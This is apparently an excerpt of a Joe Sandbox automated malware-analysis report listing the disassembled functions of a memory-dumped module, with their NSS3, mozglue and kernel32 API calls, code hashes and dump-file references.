                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ArenaErrorUtilValue$Arena_CriticalEnterSectionUnlock$Alloc_AllocateFreeInitLockPoolcalloc
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1657373565-0
                                                                                                                                                                                                                                                            • Opcode ID: 3a037b4ec4f3de494f6e2813df8e008bc0e7ce8e7d569cce4998348afef98f2e
                                                                                                                                                                                                                                                            • Instruction ID: 8b56426a03a609eaa1273deb3746a445c7c67615f48439435ef72cc72c580c9a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a037b4ec4f3de494f6e2813df8e008bc0e7ce8e7d569cce4998348afef98f2e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC21A1B1A00202AFDB10CF68DC81B06BBA4FF14319F148265EC18DB356E775E561CBE1
                                                                                                                                                                                                                                                            Function 6BF3DA20 Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CERT_DestroyCertificate.NSS3(?,?,?,?,6BF3DB6F,00000000,?,?,?,6BF53E93,00000000,?,?,?), ref: 6BF3DA35
                                                                                                                                                                                                                                                              • Part of subcall function 6BEC95B0: TlsGetValue.KERNEL32(00000000,?,6BEE00D2,00000000), ref: 6BEC95D2
                                                                                                                                                                                                                                                              • Part of subcall function 6BEC95B0: EnterCriticalSection.KERNEL32(?,?,?,6BEE00D2,00000000), ref: 6BEC95E7
                                                                                                                                                                                                                                                              • Part of subcall function 6BEC95B0: PR_Unlock.NSS3(?,?,?,?,6BEE00D2,00000000), ref: 6BEC9605
                                                                                                                                                                                                                                                            • SECKEY_DestroyPrivateKey.NSS3(?), ref: 6BF3DA43
                                                                                                                                                                                                                                                              • Part of subcall function 6BED2D20: PK11_DestroyObject.NSS3(?,?), ref: 6BED2D3C
                                                                                                                                                                                                                                                              • Part of subcall function 6BED2D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6BED2D5F
                                                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6BF3DA67
                                                                                                                                                                                                                                                              • Part of subcall function 6BF21200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6BEC88A4,00000000,00000000), ref: 6BF21228
                                                                                                                                                                                                                                                              • Part of subcall function 6BF21200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6BF21238
                                                                                                                                                                                                                                                              • Part of subcall function 6BF21200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6BEC88A4,00000000,00000000), ref: 6BF2124B
                                                                                                                                                                                                                                                              • Part of subcall function 6BF21200: PR_CallOnce.NSS3(6C022AA4,6BF212D0,00000000,00000000,00000000,?,6BEC88A4,00000000,00000000), ref: 6BF2125D
                                                                                                                                                                                                                                                              • Part of subcall function 6BF21200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6BF2126F
                                                                                                                                                                                                                                                              • Part of subcall function 6BF21200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6BF21280
                                                                                                                                                                                                                                                              • Part of subcall function 6BF21200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6BF2128E
                                                                                                                                                                                                                                                              • Part of subcall function 6BF21200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6BF2129A
                                                                                                                                                                                                                                                              • Part of subcall function 6BF21200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6BF212A1
                                                                                                                                                                                                                                                              • Part of subcall function 6BF37F90: PR_GetMonitorEntryCount.NSS3(?,?,00000002,00000050,?,?,?,?,?,00000000), ref: 6BF37FB2
                                                                                                                                                                                                                                                              • Part of subcall function 6BF37F90: PR_EnterMonitor.NSS3(?,?,?,00000002,00000050,?,?,?,?,?,00000000), ref: 6BF37FD4
                                                                                                                                                                                                                                                              • Part of subcall function 6BF37F90: PR_ExitMonitor.NSS3(?), ref: 6BF3801B
                                                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6BF3DAA4
                                                                                                                                                                                                                                                            • CERT_CertChainFromCert.NSS3(?,00000000,00000000,?,?,?,6BF3DB6F,00000000,?,?,?,6BF53E93,00000000,?,?,?), ref: 6BF3DADF
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CriticalDestroyEnterFreeMonitorSectionfree$ArenaArena_CertPoolUnlockUtilValue$CallCertificateChainClearCountDeleteEntryExitFromK11_ObjectOncePrivate
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3035505096-0
                                                                                                                                                                                                                                                            • Opcode ID: a6032d65037f8da2adc6deece943315cfb30465336c9dea28b80b3ff1ef1af6b
                                                                                                                                                                                                                                                            • Instruction ID: 7908baae993152ede5a86965a2d1aed1c57a379ec8ec5c1e31a6ecd9e53e2cbf
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a6032d65037f8da2adc6deece943315cfb30465336c9dea28b80b3ff1ef1af6b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C21B5B6944B119BDB228B76ED01B97F7ECAF40784F00042EE46AD2171EBB5B650CB91
                                                                                                                                                                                                                                                            Function 6BEE28A0 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,6BED80DD), ref: 6BEE28BA
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,6BED80DD), ref: 6BEE28D3
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,6BED80DD), ref: 6BEE28E8
                                                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(?,?,?,?,?,6BED80DD), ref: 6BEE290E
                                                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,6BED80DD), ref: 6BEE291A
                                                                                                                                                                                                                                                              • Part of subcall function 6BED9270: DeleteCriticalSection.KERNEL32(?,?,6BEE5089,?,6BEE3B70,?,?,?,?,?,6BEE5089,6BEDF39B,00000000), ref: 6BED927F
                                                                                                                                                                                                                                                              • Part of subcall function 6BED9270: free.MOZGLUE(?,?,6BEE3B70,?,?,?,?,?,6BEE5089,6BEDF39B,00000000), ref: 6BED9286
                                                                                                                                                                                                                                                              • Part of subcall function 6BED9270: PL_HashTableDestroy.NSS3(?,6BEE3B70,?,?,?,?,?,6BEE5089,6BEDF39B,00000000), ref: 6BED9292
                                                                                                                                                                                                                                                              • Part of subcall function 6BED8B50: TlsGetValue.KERNEL32(00000000,?,6BEE0948,00000000), ref: 6BED8B6B
                                                                                                                                                                                                                                                              • Part of subcall function 6BED8B50: EnterCriticalSection.KERNEL32(?,?,?,6BEE0948,00000000), ref: 6BED8B80
                                                                                                                                                                                                                                                              • Part of subcall function 6BED8B50: PL_FinishArenaPool.NSS3(?,?,?,?,6BEE0948,00000000), ref: 6BED8B8F
                                                                                                                                                                                                                                                              • Part of subcall function 6BED8B50: PR_Unlock.NSS3(?,?,?,?,6BEE0948,00000000), ref: 6BED8BA1
                                                                                                                                                                                                                                                              • Part of subcall function 6BED8B50: DeleteCriticalSection.KERNEL32(?,?,?,?,6BEE0948,00000000), ref: 6BED8BAC
                                                                                                                                                                                                                                                              • Part of subcall function 6BED8B50: free.MOZGLUE(?,?,?,?,?,6BEE0948,00000000), ref: 6BED8BB8
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CriticalSection$Deletefree$EnterUnlockValue$ArenaDestroyFinishHashPoolTable
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3225375108-0
                                                                                                                                                                                                                                                            • Opcode ID: 7a95d27d7d7f4031a525e573d0ad10f89bb67f3624f82f519f7e82779abbe5f0
                                                                                                                                                                                                                                                            • Instruction ID: 8906e5d069d4ca90efccbc476fd100390b39595a76852c012186a104236e31c1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7a95d27d7d7f4031a525e573d0ad10f89bb67f3624f82f519f7e82779abbe5f0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40213CB5A04A068BCB00BF78C489529BBF4FF05354F114969DCD497300EB38E896CBA2
                                                                                                                                                                                                                                                            Function 6BEBBA40 Relevance: 7.6, APIs: 5, Instructions: 65COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6BEBBA51
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6BEBBA6B
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32 ref: 6BEBBA83
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6BEBBAA1
                                                                                                                                                                                                                                                            • _PR_MD_UNLOCK.NSS3 ref: 6BEBBAC0
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07AD
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07CD
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07D6
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6BE4204A), ref: 6BEB07E4
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,6BE4204A), ref: 6BEB0864
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6BEB0880
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,6BE4204A), ref: 6BEB08CB
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(?,?,6BE4204A), ref: 6BEB08D7
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(?,?,6BE4204A), ref: 6BEB08FB
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value$calloc$CriticalEnterSection
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2444776475-0
                                                                                                                                                                                                                                                            • Opcode ID: f714db6d2e252cb6082aa51cd501dae11abe03c829dea5cb9cbc763f8e0f1c96
                                                                                                                                                                                                                                                            • Instruction ID: cab630b9e53068520030c831132ea41a8997e034fe2682255ae784b258296a5b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f714db6d2e252cb6082aa51cd501dae11abe03c829dea5cb9cbc763f8e0f1c96
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 32217CB1D04205CBDB00AF7CC689569BBB4FF42358F298678DC888B211EF38D895CB91
                                                                                                                                                                                                                                                            Function 6BEB09E0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(00000000,?,?,?,6BEB06A2,00000000,?), ref: 6BEB09F8
                                                                                                                                                                                                                                                            • malloc.MOZGLUE(0000001F), ref: 6BEB0A18
                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,00000001), ref: 6BEB0A33
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07AD
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07CD
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07D6
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6BE4204A), ref: 6BEB07E4
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,6BE4204A), ref: 6BEB0864
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6BEB0880
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,6BE4204A), ref: 6BEB08CB
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(?,?,6BE4204A), ref: 6BEB08D7
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(?,?,6BE4204A), ref: 6BEB08FB
                                                                                                                                                                                                                                                            • PR_Free.NSS3(?), ref: 6BEB0A6C
                                                                                                                                                                                                                                                            • PR_Free.NSS3(?), ref: 6BEB0A87
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value$Freecalloc$mallocmemcpy
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 207547555-0
                                                                                                                                                                                                                                                            • Opcode ID: 8b879f2ed1d199c26609dad5d8126b4fa57d01c8ccb8ecc274980fc5eb5f5df1
                                                                                                                                                                                                                                                            • Instruction ID: 56decd93bcf4569e782dac761950a81f25832444a0ed57bb152742e22c0894d2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8b879f2ed1d199c26609dad5d8126b4fa57d01c8ccb8ecc274980fc5eb5f5df1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E61103B2900B419BEB119F74CB86B17B7B8BF41358F605D38D85682A12FB39F464C790
                                                                                                                                                                                                                                                            Function 6BF54AF0 Relevance: 7.6, APIs: 5, Instructions: 62COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PR_MemUnmap.NSS3(00015180,00000005,?,6BF54AD1), ref: 6BF54B62
                                                                                                                                                                                                                                                            • free.MOZGLUE(?,00015180,00000005,?,6BF54AD1), ref: 6BF54B76
                                                                                                                                                                                                                                                              • Part of subcall function 6BF503C0: CloseHandle.KERNEL32(?,?,?,?,6BF54B27,?,?,00015180,00000005,?,6BF54AD1), ref: 6BF503E0
                                                                                                                                                                                                                                                              • Part of subcall function 6BF503C0: GetLastError.KERNEL32(?,6BF54B27,?,?,00015180,00000005,?,6BF54AD1), ref: 6BF503FD
                                                                                                                                                                                                                                                              • Part of subcall function 6BF503C0: DeleteCriticalSection.KERNEL32(00000005,?,?,?,6BF54B27,?,?,00015180,00000005,?,6BF54AD1), ref: 6BF50419
                                                                                                                                                                                                                                                              • Part of subcall function 6BF503C0: free.MOZGLUE(?,?,6BF54B27,?,?,00015180,00000005,?,6BF54AD1), ref: 6BF50420
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,00015180,00000005,?,6BF54AD1), ref: 6BF54B96
                                                                                                                                                                                                                                                            • free.MOZGLUE(?,?,6BF54AD1), ref: 6BF54B9D
                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(6C022F9C,00000000,00000090,00015180,00000005,?,6BF54AD1), ref: 6BF54BB2
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: free$CloseHandle$CriticalDeleteErrorLastSectionUnmapmemset
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 447902086-0
                                                                                                                                                                                                                                                            • Opcode ID: 609128f86fa5db757b98054610d04596ccbc1521b06efc5832de795a4681b677
                                                                                                                                                                                                                                                            • Instruction ID: 5887d7710a0e99654f0ac928ef6fb2ebb6c4372a0be74c23effc2d623ec8b8c4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 609128f86fa5db757b98054610d04596ccbc1521b06efc5832de795a4681b677
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8211D073B00510BBDE219BA4CC5AB46B339BB2A358F140064E98953234DB3DA471DBE6
                                                                                                                                                                                                                                                            Function 6BF2D9A0 Relevance: 7.6, APIs: 5, Instructions: 57COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SEC_PKCS7DecoderStart.NSS3 ref: 6BF2D9C5
                                                                                                                                                                                                                                                              • Part of subcall function 6BF2D430: PORT_NewArena_Util.NSS3(00000400), ref: 6BF2D43B
                                                                                                                                                                                                                                                              • Part of subcall function 6BF2D430: PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6BF2D452
                                                                                                                                                                                                                                                              • Part of subcall function 6BF2D430: PORT_ZAlloc_Util.NSS3(00000044), ref: 6BF2D48D
                                                                                                                                                                                                                                                              • Part of subcall function 6BF2D430: PORT_NewArena_Util.NSS3(00000400), ref: 6BF2D4A0
                                                                                                                                                                                                                                                            • SEC_PKCS7DecoderUpdate.NSS3(00000000,?,?), ref: 6BF2D9DD
                                                                                                                                                                                                                                                              • Part of subcall function 6BF2D8A0: PR_GetCurrentThread.NSS3 ref: 6BF2D8D0
                                                                                                                                                                                                                                                              • Part of subcall function 6BF2D8A0: SEC_PKCS7DestroyContentInfo.NSS3(00000000), ref: 6BF2D905
                                                                                                                                                                                                                                                              • Part of subcall function 6BF2D8A0: PR_SetError.NSS3(FFFFE005,00000000), ref: 6BF2D921
                                                                                                                                                                                                                                                            • SEC_PKCS7DestroyContentInfo.NSS3(?), ref: 6BF2D9FC
                                                                                                                                                                                                                                                              • Part of subcall function 6BF2C6E0: SECOID_FindOID_Util.NSS3(?,?,?,?,?,?,6BF271CF,?), ref: 6BF2C70F
                                                                                                                                                                                                                                                              • Part of subcall function 6BF2C6E0: CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6BF271CF,?), ref: 6BF2C811
                                                                                                                                                                                                                                                              • Part of subcall function 6BF2C6E0: CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6BF271CF,?), ref: 6BF2C841
                                                                                                                                                                                                                                                              • Part of subcall function 6BF2C6E0: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6BF2C855
                                                                                                                                                                                                                                                              • Part of subcall function 6BF2C6E0: PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,?,?,6BF271CF,?), ref: 6BF2C868
                                                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6BF2DA1B
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6BF2DA24
                                                                                                                                                                                                                                                              • Part of subcall function 6BF1DD00: PR_SetError.NSS3(FFFFE009,00000000,?,-00000001,?,6BF26CD3,?), ref: 6BF1DD1B
                                                                                                                                                                                                                                                              • Part of subcall function 6BF1DD00: PORT_FreeArena_Util.NSS3(6BF26CD3,00000001,?,-00000001,?,6BF26CD3,?), ref: 6BF1DD2A
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Util$Arena_$DestroyFree$Alloc_CertificateContentDecoderErrorInfo$ArenaCurrentFindStartThreadUpdatefree
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2712268329-0
                                                                                                                                                                                                                                                            • Opcode ID: 2e0a7c999a9f9d7074929fc29b5accd836f0046961a15af720ae2468ced248de
                                                                                                                                                                                                                                                            • Instruction ID: 010a0aa33f95acd47c557cbd27f005f83e0d7564c577e6826e5ed045a5670548
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e0a7c999a9f9d7074929fc29b5accd836f0046961a15af720ae2468ced248de
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E11A37BE442015BE700DFAD9C01E5AB7E8AF94248F054038FC58D3232EB39E5148B92
                                                                                                                                                                                                                                                            Function 6BEC3B50 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6BEC3B69
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6BEC3B79
                                                                                                                                                                                                                                                            • PL_HashTableLookup.NSS3(?), ref: 6BEC3B89
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6BEC3B99
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE09A,00000000), ref: 6BEC3BC6
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
